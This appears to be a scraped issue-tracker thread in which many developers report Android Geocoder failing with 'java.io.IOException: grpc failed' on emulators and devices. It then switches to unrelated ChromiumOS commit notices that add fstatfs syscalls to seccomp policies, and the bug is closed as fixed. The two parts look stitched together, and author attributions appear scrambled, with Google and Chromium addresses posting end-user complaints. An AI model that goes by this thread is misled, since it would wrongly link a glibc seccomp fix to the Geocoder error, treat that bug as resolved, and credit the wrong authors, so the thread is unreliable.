Fixed
Status Update
Comments
[Deleted User] <[Deleted User]> #2
Same problem, but not only with simulator.
[Deleted User] <[Deleted User]> #3
Suffering same issue. java.io.IOException: grpc failed after calling geocoder.getFromLocation()
It happens on all emulator APIs I've tried (API levels tested were 23, 24, 25 using x86_64 Google APIs images and API 26 using x86 Google APIs). Real devices seem to work fine. Definitely a more recent issue since my app is many years in development and this was not always a problem. My app falls back to use https://maps.googleapis.com/maps/api/geocode/json?latlng=. .. but this is a quota limited API and slow.
aa...@google.com <aa...@google.com> #4
This is working for me on all of my emulator APIs that were previously failing a couple of days ago (21 through 25). Just curious - does anyone know how the fix was delivered? I didn't manually update my Android software.
ra...@chromium.org <ra...@chromium.org> #5
I can confirm that the problem has gone away for me also without any change to my virtual devices.
aa...@google.com <aa...@google.com> #6
Suffering same issue. java.io.IOException: grpc failed after calling geocoder.getFromLocationName().
Note that the other method call (getFromLocation()) is working fine. From what I noticed, the issue seems to be related to Google Play Services installed on the device. I tried using the geolocator with PlayServices 11.5.09 and I get the grpc failed error. If I rollback to the factory version of Play Services (i.e. uninstalling updates), Geocoder's method "getFromLocationName" works again.
aa...@google.com <aa...@google.com> #7
I have checked back; as #4 mentioned, the problem on the emulator seems to be fixed and must have been a server-side issue or, as #6 mentioned, a problem with Google Play Services. I haven't had problems on my real device, but results might differ, as I was testing using Huawei P9 Plus.
ja...@google.com <ja...@google.com> #8
Thank you for reporting this issue. Can you please provide the below requested information to better understand the issue:
Steps to reproduce
Please provide source code or apk of a sample application to reproduce the issue.
Also kindly mention the steps to be followed for reproducing the issue with the given sample application.
Frequency
How frequently does this issue occur? (e.g 100% of the time, 10% of the time)
ja...@google.com <ja...@google.com> #9
Hi ar...@google.com, I too have this same issue. You shall refer to the screenshots shared by #1, it is exactly where the issue is coming. For me, this issue is inconsistent as it is working in some of Android 5.x devices and not in other devices. My customers started complaining this issue and things are going crazy here. Searching for a solution, pls help. I think it is not working when the play services is updated to latest version.
[Deleted User] <[Deleted User]> #10
I am not sure if this will help a lot, but there might be one of the following reasons that caused this problem (at least in my case):
So, I noticed that, this problem started to happen after :
- started my app on an emulator (before I had no problem with this)
- or from the last google-services update (did work fine before)
I am in this kind of problem right now also, but it fails on real device.
Notice: It doesn't always fail, just sometimes (kind of randomly, for instance I had a case in which it started working after a fail, without any app / device restart)
aa...@google.com <aa...@google.com> #11
I also got the same issue. LocationManager.getFromLocation(latitude, longitude,maxresults,params,results ) gives grpc failed on Oppo real time mobile device. If you get any solution, please give me the answer.
ja...@google.com <ja...@google.com> #12
I am running into the same issue as well. If I run it on simulator then no issue, but if I run it on device then there is an issue. I am using Samsung S7
aa...@google.com <aa...@google.com> #13
This issue is really crazy, is there any other alternative solutions?
jo...@chromium.org <jo...@chromium.org> #14
I am running into the same issue as well on real device, Services Google Play Version 11.9.75 ( 240-182402865)
aa...@google.com <aa...@google.com> #15
please try to fix this blocker issue ASAP.
as there is lot of people complaining about it.
ll...@google.com <ll...@google.com> #16
I am running into the same issue as well on HUAWEI PRA-LX1 (Android 7.0, API 24).
ma...@chromium.org <ma...@chromium.org> #17
Hi all, I have been inactive on this thread for some time, but I guess the fix hasn't really been implemented for all environments based on the comments here. Please include your current Google Play Services version and as much environment information as possible to help find a solution or workaround if possible. I hope that this issue is escalated to either a P1 or P2 issue.
ma...@chromium.org <ma...@chromium.org> #18
Facing same problem on Samsung J7 2016
jo...@chromium.org <jo...@chromium.org> #19
ar...@google.com, is...@google.com
Here are the exact steps to reproduce this problem. There are totally 3 ways to reproduce the same problem.
Case 1:
1- Restarted my phone Redmi 3s.
2- Turned GPS On, Wifi On and the Mobile Data Off.
3- Wifi is not connected to any Network. So basically No Internet Connectivity.
This led to IOException: grpc failed.
Case 2:
1- Turned Wifi On and GPS, Mobile Data both were Turned Off.
2- Wifi is not connected to any Network. So basically No Internet Connectivity.
This led to IOException: grpc failed.
Case 3:
1- Turned On Wifi, GPS and Mobile Data.
2- Wifi is not connected to any Network and also Mobile Data has Low or Mostly No Connectivity.
This led to IOException: grpc failed.
Case 4:
1- Turned Off Wifi, GPS and Mobile Data.
This led to IOException: grpc failed.
Case 5:
1- Turned Off Wifi and Mobile Data while GPS was Turned On.
This led to IOException: grpc failed.
Google Play Services: Version- 14.3.66 (040406-213742215)
Mobile Phones Used: Redmi 3s (Android 6.0.1 Marshmallow), Oppo F1s (Android 5.1 Lollipop)
ja...@google.com <ja...@google.com> #20
The issue seems to be related to the connection speed. You can reproduce it easily using the Emulator: set Network type to GPRS and you get a grpc failed exception every time.
jo...@chromium.org <jo...@chromium.org> #21
I'm facing same problem. how to resolve that grpc failed and what is the common reason to have that result?
[Deleted User] <[Deleted User]> #23
change the emulator's network type i just changed it to LTE and its working
ma...@chromium.org <ma...@chromium.org> #24
i'm using nokia 5.1+ (Pie) and get same error
ma...@chromium.org <ma...@chromium.org> #25
Same. This frequently happens on real devices as well.
[Deleted User] <[Deleted User]> #26
same issue on pixel 2 XL
[Deleted User] <[Deleted User]> #27
Same issue on LG-D802 with Android 4.4 and Google Play Services.Maps 16.1.0. Works correctly on Galaxy Nexus and various emulators.
minSdkVersion 14
targetSdkVersion 28
ma...@google.com <ma...@google.com> #28
Same issue on Nokia 6
AndoridAPIVersion : 27
aj...@google.com <aj...@google.com> #29
same on
minSdkVersion 15
targetSdkVersion 28
ma...@chromium.org <ma...@chromium.org> #30
Same issue on Moto e4. Tried geocoder as a service and the same issue.
ma...@chromium.org <ma...@chromium.org> #31
same
ma...@chromium.org <ma...@chromium.org> #32
Same issue. api 29, pixel emulator
"java.io.IOException: grpc failed
at android.location.Geocoder.getFromLocation(Geocoder.java:136)"
gi...@appspot.gserviceaccount.com <gi...@appspot.gserviceaccount.com> #33
The same issue.
Someone please help!
ja...@google.com <ja...@google.com> #34
I am facing the same issue -> Service Not Available (Failed to fetch address)
java.io.IOException: grpc failed
aj...@google.com <aj...@google.com> #35
same issue on pixel 2 android 10 device, target sdk is api 28
ja...@google.com <ja...@google.com> #36
Same issue here.
gi...@appspot.gserviceaccount.com <gi...@appspot.gserviceaccount.com> #37
2 years and still no fix?
gi...@appspot.gserviceaccount.com <gi...@appspot.gserviceaccount.com> #38
I had to turn on Wifi on the emulator to work.
gi...@appspot.gserviceaccount.com <gi...@appspot.gserviceaccount.com> #39
I have the same issue on multiple devices, Samsung S5, A30, A50 and A50S, with different version of API. I used AsyncTask and split it from main thread but it still gives me this error:
W/System.err: java.io.IOException: grpc failed
W/System.err: at android.location.Geocoder.getFromLocation(Geocoder.java:136)
gi...@appspot.gserviceaccount.com <gi...@appspot.gserviceaccount.com> #40
Same problem
gi...@appspot.gserviceaccount.com <gi...@appspot.gserviceaccount.com> #41
Google API: grpc failed Same issue
gi...@appspot.gserviceaccount.com <gi...@appspot.gserviceaccount.com> #42
Same problem.
At Pixel 2 API 28
gi...@appspot.gserviceaccount.com <gi...@appspot.gserviceaccount.com> #43
Same problem
Huawei p9 Lite
minSdkVersion 21
compileSdkVersion 28
targetSdkVersion 28
play services version :
com.google.android.gms:play-services-location : 17.0.0
Error : java.io.IOException: grpc failed
gi...@appspot.gserviceaccount.com <gi...@appspot.gserviceaccount.com> #44
@Sebastianbaar
Sir,
I'm getting grpc failed while accessing the GeoCoder, can you help me Sir..
i have been tracking your post about these on few years back, but still i could not fix it.
Sorry about my english...
gi...@appspot.gserviceaccount.com <gi...@appspot.gserviceaccount.com> #45
Suddenly got this issue on Android 10. I have stable internet connection, so it doesn't help. And got this issue first time a week ago, so it's something new.
gi...@appspot.gserviceaccount.com <gi...@appspot.gserviceaccount.com> #46
Same Problem
Honor 9 Lite
Android 9.0.0
minSdkVersion 21
compileSdkVersion 28
targetSdkVersion 28
play services version :
com.google.android.gms:play-services-location : 17.0.0
Error : java.io.IOException: grpc failed
gi...@appspot.gserviceaccount.com <gi...@appspot.gserviceaccount.com> #47
compileSdkVersion 29
buildToolsVersion "29.0.3"
minSdkVersion 21
targetSdkVersion 29
Device - Nokia 6.1 plus
Android -10
implementation 'com.google.android.gms:play-services-maps:17.0.0'
implementation 'com.google.android.gms:play-services-location:17.0.0'
issue - It used to work initially but all of a sudden it is not working. Trying to figure it out from past 5 hours but didn't find proper solution. Any solution would be appreciated.
gi...@appspot.gserviceaccount.com <gi...@appspot.gserviceaccount.com> #48
java.io.IOException: grpc failed
I am facing this issue also, please let me know if there is any solution.
gi...@appspot.gserviceaccount.com <gi...@appspot.gserviceaccount.com> #49
I m facing this issue on real device.
gi...@appspot.gserviceaccount.com <gi...@appspot.gserviceaccount.com> #50
Yes, this exception is thrown sometimes and I don't know the reason behind it.
gi...@appspot.gserviceaccount.com <gi...@appspot.gserviceaccount.com> #51
same here
gi...@appspot.gserviceaccount.com <gi...@appspot.gserviceaccount.com> #52
same here on emulator and real device in production. switch airplane mode to off then on resolve the issue but I can't tell my user to do it every time it happens.
gi...@appspot.gserviceaccount.com <gi...@appspot.gserviceaccount.com> #53
same here......
gi...@appspot.gserviceaccount.com <gi...@appspot.gserviceaccount.com> #54
Thank you for your feedback. We assure you that we are doing our best to address all issues reported. For now, we will be closing the issue as won't fix obsolete. If this issue currently still exists, we request that you log a new issue along with the bug report here https://goo.gl/TbMiIO and reference this bug for context.
gi...@appspot.gserviceaccount.com <gi...@appspot.gserviceaccount.com> #55
Reopened on
gi...@appspot.gserviceaccount.com <gi...@appspot.gserviceaccount.com> #56
i Got the same problem with API 28 on emulator ! :(:( sometimes works.. sometimes not..
gi...@appspot.gserviceaccount.com <gi...@appspot.gserviceaccount.com> #57
same here... i finished my project yesterday 12/8/2020 and everything worked fine as i expected but a day after (today 12/9/2020) i get that error whenever i try to retrieve data from geocoder
gi...@appspot.gserviceaccount.com <gi...@appspot.gserviceaccount.com> #58
just had the same problem, I tried all the recommended stuff and nothing. But I deleted the current emulator and created a new one and it worked, I guess the geocoder uses some memory and the previous emulator was full or something.
gi...@appspot.gserviceaccount.com <gi...@appspot.gserviceaccount.com> #59
Hi there,
facing the same issue in irregular cycles on real devices too, sometimes the application works fine in one go, while other times it takes multiple attempt of re-tries. Any sort of help is highly appreciated. thank you!
gi...@appspot.gserviceaccount.com <gi...@appspot.gserviceaccount.com> #60
Any solutions ?
On real devices it happens a lot ..
gi...@appspot.gserviceaccount.com <gi...@appspot.gserviceaccount.com> #61
This is still a problem
gi...@appspot.gserviceaccount.com <gi...@appspot.gserviceaccount.com> #62
Still a problem!
gi...@appspot.gserviceaccount.com <gi...@appspot.gserviceaccount.com> #63
Even doing it in a background thread, no matter what I still got crash !
PLEASE GOOGLE FIX THIS
gi...@appspot.gserviceaccount.com <gi...@appspot.gserviceaccount.com> #64
Hi All,
This issue thread has already been closed, therefore google might not see your comments.
Unfortunately I don't have access to the code and time to replicate back the issue, it's been quite long. As #55 has reopened the issue https://issuetracker.google.com/issues/168043749 please instead comment and provide the necessary information Google is requesting over there.
ma...@google.com <ma...@google.com> #65
This is still an issue even on real devices and it currently happens 90% of the time.
gi...@appspot.gserviceaccount.com <gi...@appspot.gserviceaccount.com> #66
The following revision refers to this bug:
https://chromium.googlesource.com/chromiumos/platform2/+/db571d2030f088c20fad75c127ba6f2cd21e6df5
commit db571d2030f088c20fad75c127ba6f2cd21e6df5
Author: Jordan R Abrahams <ajordanr@google.com>
Date: Mon Aug 23 17:18:50 2021
kerberos: Add fstatfs(64) syscalls to seccomp policies
Due to a local security hardening patch in glibc, we're now
calling fstatfs and fstatfs64 during dlopen. This is crashing
kerberos at present. This commit should fix the issue.
Issue was identified via crash.corp: http://shortn/_IPa2XutpBT
BUG=chromium:1182687
TEST=CQ
Change-Id: I0fe950ab6889ab8c7551d82b9a11f7b6426edd34
Reviewed-on: https://chromium-review.googlesource.com/c/chromiumos/platform2/+/3114474
Reviewed-by: Manoj Gupta <manojgupta@chromium.org>
Reviewed-by: Felipe Andrade <fsandrade@chromium.org>
Tested-by: Jordan R Abrahams <ajordanr@google.com>
Commit-Queue: Felipe Andrade <fsandrade@chromium.org>
[modify] https://crrev.com/db571d2030f088c20fad75c127ba6f2cd21e6df5/kerberos/seccomp/kerberosd-seccomp-amd64.policy
[modify] https://crrev.com/db571d2030f088c20fad75c127ba6f2cd21e6df5/kerberos/seccomp/kerberosd-seccomp-arm.policy
[modify] https://crrev.com/db571d2030f088c20fad75c127ba6f2cd21e6df5/kerberos/seccomp/kerberosd-seccomp-arm64.policy
gi...@appspot.gserviceaccount.com <gi...@appspot.gserviceaccount.com> #67
The following revision refers to this bug:
https://chromium.googlesource.com/chromiumos/platform2/+/fa7288c6ff9db1539a522bb91f05b8aba56b797e
commit fa7288c6ff9db1539a522bb91f05b8aba56b797e
Author: Jordan R Abrahams <ajordanr@google.com>
Date: Mon Aug 23 17:45:29 2021
ml: Add fstatfs(64) syscalls to seccomp policies
Due to a local security hardening patch in glibc, we're now
calling fstatfs and fstatfs64 during dlopen. This is crashing
ml_service at present. This commit should fix the issue.
Issue was identified via crash.corp: http://shortn/_13ritdxMg6
BUG=chromium:1182687
TEST=CQ
Change-Id: I191504a166c86a847d3440af8fddeea97f31f72f
Reviewed-on: https://chromium-review.googlesource.com/c/chromiumos/platform2/+/3114478
Reviewed-by: Honglin Yu <honglinyu@chromium.org>
Reviewed-by: Xinglong Luan <alanlxl@chromium.org>
Commit-Queue: Manoj Gupta <manojgupta@chromium.org>
Tested-by: Manoj Gupta <manojgupta@chromium.org>
[modify] https://crrev.com/fa7288c6ff9db1539a522bb91f05b8aba56b797e/ml/seccomp/ml_service-HandwritingModel-seccomp-amd64.policy
[modify] https://crrev.com/fa7288c6ff9db1539a522bb91f05b8aba56b797e/ml/seccomp/ml_service-HandwritingModel-seccomp-arm.policy
[modify] https://crrev.com/fa7288c6ff9db1539a522bb91f05b8aba56b797e/ml/seccomp/ml_service-SodaModel-seccomp-amd64.policy
[modify] https://crrev.com/fa7288c6ff9db1539a522bb91f05b8aba56b797e/ml/seccomp/ml_service-SodaModel-seccomp-arm.policy
gi...@appspot.gserviceaccount.com <gi...@appspot.gserviceaccount.com> #68
The following revision refers to this bug:
https://chromium.googlesource.com/chromiumos/platform2/+/81be69d9ff9642b8a950a789f2b7dffd6a68e5d1
commit 81be69d9ff9642b8a950a789f2b7dffd6a68e5d1
Author: Jordan R Abrahams <ajordanr@google.com>
Date: Thu Aug 26 16:54:11 2021
smbfs: Add fstatfs(64) to seccomp policies
Due to a local security hardening patch in glibc, we're now
calling fstatfs and fstatfs64 during dlopen. This is crashing
smbfs at present. This commit should fix the issue.
Issue was identified via crash.corp: http://shortn/_Rx9DKe3lUw
BUG=chromium:1182687
TEST=CQ
Change-Id: I2237dac4cc4821c92d19db1e6c8a140e98a41cfd
Reviewed-on: https://chromium-review.googlesource.com/c/chromiumos/platform2/+/3122497
Commit-Queue: Manoj Gupta <manojgupta@chromium.org>
Reviewed-by: Peter Marshall <petermarshall@chromium.org>
Reviewed-by: Manoj Gupta <manojgupta@chromium.org>
Tested-by: Manoj Gupta <manojgupta@chromium.org>
[modify] https://crrev.com/81be69d9ff9642b8a950a789f2b7dffd6a68e5d1/smbfs/seccomp_filters/smbfs-seccomp-amd64.policy
[modify] https://crrev.com/81be69d9ff9642b8a950a789f2b7dffd6a68e5d1/smbfs/seccomp_filters/smbfs-seccomp-arm.policy
[modify] https://crrev.com/81be69d9ff9642b8a950a789f2b7dffd6a68e5d1/smbfs/seccomp_filters/smbfs-seccomp-arm64.policy
gi...@appspot.gserviceaccount.com <gi...@appspot.gserviceaccount.com> #69
The following revision refers to this bug:
https://chromium.googlesource.com/chromiumos/platform2/+/f110fbf8ddca6bc8dc9a4641ba9a40c9cf2b07a6
commit f110fbf8ddca6bc8dc9a4641ba9a40c9cf2b07a6
Author: François Degros <fdegros@chromium.org>
Date: Wed Aug 25 01:57:21 2021
cros-disks: Add fstatfs* to archivemount seccomp policies
A change in glibc will force all systems which load shared libraries to
call the fstatfs or fstatfs64 syscall.
BUG=chromium:1182687
TEST=None
Change-Id: I0d40d57ed541226c9a3e734f5414ff115504e887
Reviewed-on: https://chromium-review.googlesource.com/c/chromiumos/platform2/+/3120767
Reviewed-by: Austin Tankiang <austinct@chromium.org>
Commit-Queue: François Degros <fdegros@chromium.org>
Tested-by: François Degros <fdegros@chromium.org>
[modify] https://crrev.com/f110fbf8ddca6bc8dc9a4641ba9a40c9cf2b07a6/cros-disks/archivemount-seccomp-amd64.policy
[modify] https://crrev.com/f110fbf8ddca6bc8dc9a4641ba9a40c9cf2b07a6/cros-disks/archivemount-seccomp-arm.policy
[modify] https://crrev.com/f110fbf8ddca6bc8dc9a4641ba9a40c9cf2b07a6/cros-disks/archivemount-seccomp-arm64.policy
gi...@appspot.gserviceaccount.com <gi...@appspot.gserviceaccount.com> #70
The following revision refers to this bug:
https://chromium.googlesource.com/chromiumos/platform/touch_updater/+/97e19f6c183413affb7dbef8b4265234b78f6365
commit 97e19f6c183413affb7dbef8b4265234b78f6365
Author: Jordan R Abrahams <ajordanr@google.com>
Date: Tue Aug 24 20:48:08 2021
Add fstatfs(64) syscalls to seccomp policies
Due to a local security hardening patch in glibc, we're now
calling fstatfs and fstatfs64 during dlopen. This is crashing
dash and kmod at present, which we _suspect_ some of those
crashes may be due to uncaught errors in touch_updater policies,
Crashes were identified via crash.corp
dash: http://shortn/_eLdGeNd8sp
kmod: http://shortn/_IheitZgfkV
BUG=chromium:1182687
TEST=Check CQ for dash seccomp failures during HW tests
Change-Id: Ie2ac28ca6ba84b94139ec65ae52dd8e3e73a9b7f
Reviewed-on: https://chromium-review.googlesource.com/c/chromiumos/platform/touch_updater/+/3116692
Tested-by: Jordan R Abrahams <ajordanr@google.com>
Commit-Queue: Jordan R Abrahams <ajordanr@google.com>
Reviewed-by: Andrew de los Reyes <adlr@chromium.org>
Reviewed-by: Harry Cutts <hcutts@chromium.org>
[modify] https://crrev.com/97e19f6c183413affb7dbef8b4265234b78f6365/etphidiap/policies/amd64/etphidiap.query.policy
[modify] https://crrev.com/97e19f6c183413affb7dbef8b4265234b78f6365/etphidiap/policies/amd64/etphidiap.update.policy
[modify] https://crrev.com/97e19f6c183413affb7dbef8b4265234b78f6365/policies/amd64/elani2chid.query.policy
[modify] https://crrev.com/97e19f6c183413affb7dbef8b4265234b78f6365/policies/amd64/elani2chid.update.policy
[modify] https://crrev.com/97e19f6c183413affb7dbef8b4265234b78f6365/policies/amd64/emrightupdate.query.policy
[modify] https://crrev.com/97e19f6c183413affb7dbef8b4265234b78f6365/policies/amd64/emrightupdate.update.policy
[modify] https://crrev.com/97e19f6c183413affb7dbef8b4265234b78f6365/policies/amd64/eps2pstiap.query.policy
[modify] https://crrev.com/97e19f6c183413affb7dbef8b4265234b78f6365/policies/amd64/eps2pstiap.update.policy
[modify] https://crrev.com/97e19f6c183413affb7dbef8b4265234b78f6365/policies/amd64/g2touch.query.policy
[modify] https://crrev.com/97e19f6c183413affb7dbef8b4265234b78f6365/policies/amd64/g2touch.update.policy
[modify] https://crrev.com/97e19f6c183413affb7dbef8b4265234b78f6365/policies/amd64/gdixupdate.query.policy
[modify] https://crrev.com/97e19f6c183413affb7dbef8b4265234b78f6365/policies/amd64/gdixupdate.update.policy
[modify] https://crrev.com/97e19f6c183413affb7dbef8b4265234b78f6365/policies/amd64/mfsupdate.query.policy
[modify] https://crrev.com/97e19f6c183413affb7dbef8b4265234b78f6365/policies/amd64/mfsupdate.update.policy
[modify] https://crrev.com/97e19f6c183413affb7dbef8b4265234b78f6365/policies/amd64/pixtpfwup.query.policy
[modify] https://crrev.com/97e19f6c183413affb7dbef8b4265234b78f6365/policies/amd64/pixtpfwup.update.policy
[modify] https://crrev.com/97e19f6c183413affb7dbef8b4265234b78f6365/policies/amd64/rmi4update.query.policy
[modify] https://crrev.com/97e19f6c183413affb7dbef8b4265234b78f6365/policies/amd64/rmi4update.update.policy
[modify] https://crrev.com/97e19f6c183413affb7dbef8b4265234b78f6365/policies/amd64/sisupdate.query.policy
[modify] https://crrev.com/97e19f6c183413affb7dbef8b4265234b78f6365/policies/amd64/sisupdate.update.policy
[modify] https://crrev.com/97e19f6c183413affb7dbef8b4265234b78f6365/policies/amd64/wacom_flash.query.policy
[modify] https://crrev.com/97e19f6c183413affb7dbef8b4265234b78f6365/policies/amd64/wacom_flash.update.policy
[modify] https://crrev.com/97e19f6c183413affb7dbef8b4265234b78f6365/policies/amd64/wdt_util.query.policy
[modify] https://crrev.com/97e19f6c183413affb7dbef8b4265234b78f6365/policies/amd64/wdt_util.update.policy
[modify] https://crrev.com/97e19f6c183413affb7dbef8b4265234b78f6365/policies/amd64/zinitixupdate.query.policy
[modify] https://crrev.com/97e19f6c183413affb7dbef8b4265234b78f6365/policies/amd64/zinitixupdate.update.policy
[modify] https://crrev.com/97e19f6c183413affb7dbef8b4265234b78f6365/policies/arm/elani2chid.query.policy
[modify] https://crrev.com/97e19f6c183413affb7dbef8b4265234b78f6365/policies/arm/elani2chid.update.policy
[modify] https://crrev.com/97e19f6c183413affb7dbef8b4265234b78f6365/policies/arm/g2touch.query.policy
[modify] https://crrev.com/97e19f6c183413affb7dbef8b4265234b78f6365/policies/arm/g2touch.update.policy
[modify] https://crrev.com/97e19f6c183413affb7dbef8b4265234b78f6365/policies/arm/gdixupdate.query.policy
[modify] https://crrev.com/97e19f6c183413affb7dbef8b4265234b78f6365/policies/arm/gdixupdate.update.policy
[modify] https://crrev.com/97e19f6c183413affb7dbef8b4265234b78f6365/policies/arm/pixtpfwup.query.policy
[modify] https://crrev.com/97e19f6c183413affb7dbef8b4265234b78f6365/policies/arm/pixtpfwup.update.policy
[modify] https://crrev.com/97e19f6c183413affb7dbef8b4265234b78f6365/policies/arm/rmi4update.query.policy
[modify] https://crrev.com/97e19f6c183413affb7dbef8b4265234b78f6365/policies/arm/rmi4update.update.policy
[modify] https://crrev.com/97e19f6c183413affb7dbef8b4265234b78f6365/policies/arm/wacom_flash.query.policy
[modify] https://crrev.com/97e19f6c183413affb7dbef8b4265234b78f6365/policies/arm/wacom_flash.update.policy
[modify] https://crrev.com/97e19f6c183413affb7dbef8b4265234b78f6365/policies/arm/wdt_util.query.policy
[modify] https://crrev.com/97e19f6c183413affb7dbef8b4265234b78f6365/policies/arm/wdt_util.update.policy
[modify] https://crrev.com/97e19f6c183413affb7dbef8b4265234b78f6365/policies/arm64/g2touch.query.policy
[modify] https://crrev.com/97e19f6c183413affb7dbef8b4265234b78f6365/policies/arm64/g2touch.update.policy
[modify] https://crrev.com/97e19f6c183413affb7dbef8b4265234b78f6365/policies/arm64/rmi4update.query.policy
[modify] https://crrev.com/97e19f6c183413affb7dbef8b4265234b78f6365/policies/arm64/rmi4update.update.policy
[modify] https://crrev.com/97e19f6c183413affb7dbef8b4265234b78f6365/policies/arm64/wacom_flash.query.policy
[modify] https://crrev.com/97e19f6c183413affb7dbef8b4265234b78f6365/policies/arm64/wacom_flash.update.policy
[modify] https://crrev.com/97e19f6c183413affb7dbef8b4265234b78f6365/stupdate/policies/amd64/stupdate.query.policy
[modify] https://crrev.com/97e19f6c183413affb7dbef8b4265234b78f6365/stupdate/policies/amd64/stupdate.read.policy
[modify] https://crrev.com/97e19f6c183413affb7dbef8b4265234b78f6365/stupdate/policies/amd64/stupdate.update.policy
gi...@appspot.gserviceaccount.com <gi...@appspot.gserviceaccount.com> #71
The following revision refers to this bug:
https://chromium.googlesource.com/chromiumos/platform2/+/eb0387e68a6a10302ab94b6a1171cefbc0943d2d
commit eb0387e68a6a10302ab94b6a1171cefbc0943d2d
Author: Jordan R Abrahams <ajordanr@google.com>
Date: Mon Aug 30 20:36:09 2021
adbd: Add fstatfs(64) to seccomp filters
Due to a local security hardening patch in glibc, we're now
calling fstatfs and fstatfs64 during dlopen. This is crashing
kmod at present, which we _suspect_ some of those crashes
may be due to missing fstatfs in adbd policies.
Crashes found via crash.corp: http://shortn/_IheitZgfkV
BUG=chromium:1182687
TEST=N/A (we can't repo the issue seen in prod locally or in CQ)
Change-Id: Ie1b9daad72a9b88d564d8f750a9f774ffd8ba6e3
Reviewed-on: https://chromium-review.googlesource.com/c/chromiumos/platform2/+/3131100
Reviewed-by: Manoj Gupta <manojgupta@chromium.org>
Reviewed-by: Yusuke Sato <yusukes@chromium.org>
Commit-Queue: Manoj Gupta <manojgupta@chromium.org>
Tested-by: Manoj Gupta <manojgupta@chromium.org>
[modify]https://crrev.com/eb0387e68a6a10302ab94b6a1171cefbc0943d2d/arc/adbd/seccomp/arc-adbd-amd64.policy
[modify]https://crrev.com/eb0387e68a6a10302ab94b6a1171cefbc0943d2d/arc/adbd/seccomp/arc-adbd-arm.policy
[modify]https://crrev.com/eb0387e68a6a10302ab94b6a1171cefbc0943d2d/arc/adbd/seccomp/arc-adbd-arm64.policy
[modify]https://crrev.com/eb0387e68a6a10302ab94b6a1171cefbc0943d2d/arc/adbd/seccomp/arcvm-adbd-amd64.policy
be...@google.com <be...@google.com> #72
Hi ajordanr@, a few commits have landed recently. Is the issue fixed now and can we close this bug?
aj...@google.com <aj...@google.com> #73
This should be fixed--we're not seeing any more seccomp issues and the underlying issue does not manifest further. We can close this bug.
We have one tracking bug for RunOCI in buganizer (https://b.corp.google.com/issues/194923131) to track some cleanup.
I'd be happy to get external verification that this is fully closed. My tests for this were local (besides the RunOCI test which this patch broke legitimately).
jo...@chromium.org <jo...@chromium.org> #76
I don't think we can feasibly merge this to 93.
ll...@google.com <ll...@google.com> #77
Updating toolchain components (like glibc in this case) in branches is very difficult.
I don't think this needs updating the branch.
@jordanr: there is still the issue of getting acceptance/rejection from the glibc upstream community.
Do we have a bug for tracking that?
[Deleted User] <[Deleted User]> #80
This bug has been closed for more than 14 weeks. Removing security view restrictions.
For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot
gi...@appspot.gserviceaccount.com <gi...@appspot.gserviceaccount.com> #81
The following revision refers to this bug:
https://chromium.googlesource.com/chromiumos/platform/touch_updater/+/3d54d863f2e8c003d198c01dad1d4453d3d867a9
commit 3d54d863f2e8c003d198c01dad1d4453d3d867a9
Author: Jordan R Abrahams <ajordanr@google.com>
Date: Tue Aug 24 20:48:08 2021
Add fstatfs(64) syscalls to seccomp policies
Due to a local security hardening patch in glibc, we're now
calling fstatfs and fstatfs64 during dlopen. This is crashing
dash and kmod at present, which we _suspect_ some of those
crashes may be due to uncaught errors in touch_updater policies,
Crashes were identified via crash.corp
dash: http://shortn/_eLdGeNd8sp
kmod: http://shortn/_IheitZgfkV
BUG=chromium:1182687
TEST=Check CQ for dash seccomp failures during HW tests
Cq-Depend: chromium:3573728
Change-Id: Ie2ac28ca6ba84b94139ec65ae52dd8e3e73a9b7f
Reviewed-on: https://chromium-review.googlesource.com/c/chromiumos/platform/touch_updater/+/3116692
Tested-by: Jordan R Abrahams <ajordanr@google.com>
Commit-Queue: Jordan R Abrahams <ajordanr@google.com>
Reviewed-by: Andrew de los Reyes <adlr@chromium.org>
Reviewed-by: Harry Cutts <hcutts@chromium.org>
(cherry picked from commit 97e19f6c183413affb7dbef8b4265234b78f6365)
Reviewed-on: https://chromium-review.googlesource.com/c/chromiumos/platform/touch_updater/+/3573729
Reviewed-by: Bob Moragues <moragues@chromium.org>
Tested-by: Davis Hung <davis.hung@quanta.corp-partner.google.com>
Commit-Queue: Knox Chiou <knoxchiou@chromium.org>
Tested-by: Knox Chiou <knoxchiou@chromium.org>
[modify]https://crrev.com/3d54d863f2e8c003d198c01dad1d4453d3d867a9/policies/amd64/rmi4update.update.policy
[modify]https://crrev.com/3d54d863f2e8c003d198c01dad1d4453d3d867a9/policies/amd64/wdt_util.update.policy
[modify]https://crrev.com/3d54d863f2e8c003d198c01dad1d4453d3d867a9/policies/amd64/sisupdate.query.policy
[modify]https://crrev.com/3d54d863f2e8c003d198c01dad1d4453d3d867a9/policies/arm/wacom_flash.query.policy
[modify]https://crrev.com/3d54d863f2e8c003d198c01dad1d4453d3d867a9/policies/arm/pixtpfwup.query.policy
[modify]https://crrev.com/3d54d863f2e8c003d198c01dad1d4453d3d867a9/policies/arm/g2touch.query.policy
[modify]https://crrev.com/3d54d863f2e8c003d198c01dad1d4453d3d867a9/policies/amd64/gdixupdate.update.policy
[modify]https://crrev.com/3d54d863f2e8c003d198c01dad1d4453d3d867a9/policies/amd64/wacom_flash.query.policy
[modify]https://crrev.com/3d54d863f2e8c003d198c01dad1d4453d3d867a9/policies/arm64/rmi4update.update.policy
[modify]https://crrev.com/3d54d863f2e8c003d198c01dad1d4453d3d867a9/policies/arm64/g2touch.update.policy
[modify]https://crrev.com/3d54d863f2e8c003d198c01dad1d4453d3d867a9/policies/amd64/gdixupdate.query.policy
[modify]https://crrev.com/3d54d863f2e8c003d198c01dad1d4453d3d867a9/policies/amd64/emrightupdate.update.policy
[modify]https://crrev.com/3d54d863f2e8c003d198c01dad1d4453d3d867a9/policies/amd64/elani2chid.query.policy
[modify]https://crrev.com/3d54d863f2e8c003d198c01dad1d4453d3d867a9/policies/arm64/wacom_flash.query.policy
[modify]https://crrev.com/3d54d863f2e8c003d198c01dad1d4453d3d867a9/etphidiap/policies/amd64/etphidiap.update.policy
[modify]https://crrev.com/3d54d863f2e8c003d198c01dad1d4453d3d867a9/stupdate/policies/amd64/stupdate.read.policy
[modify]https://crrev.com/3d54d863f2e8c003d198c01dad1d4453d3d867a9/policies/amd64/mfsupdate.update.policy
[modify]https://crrev.com/3d54d863f2e8c003d198c01dad1d4453d3d867a9/policies/amd64/eps2pstiap.update.policy
[modify]https://crrev.com/3d54d863f2e8c003d198c01dad1d4453d3d867a9/policies/arm/elani2chid.update.policy
[modify]https://crrev.com/3d54d863f2e8c003d198c01dad1d4453d3d867a9/policies/amd64/rmi4update.query.policy
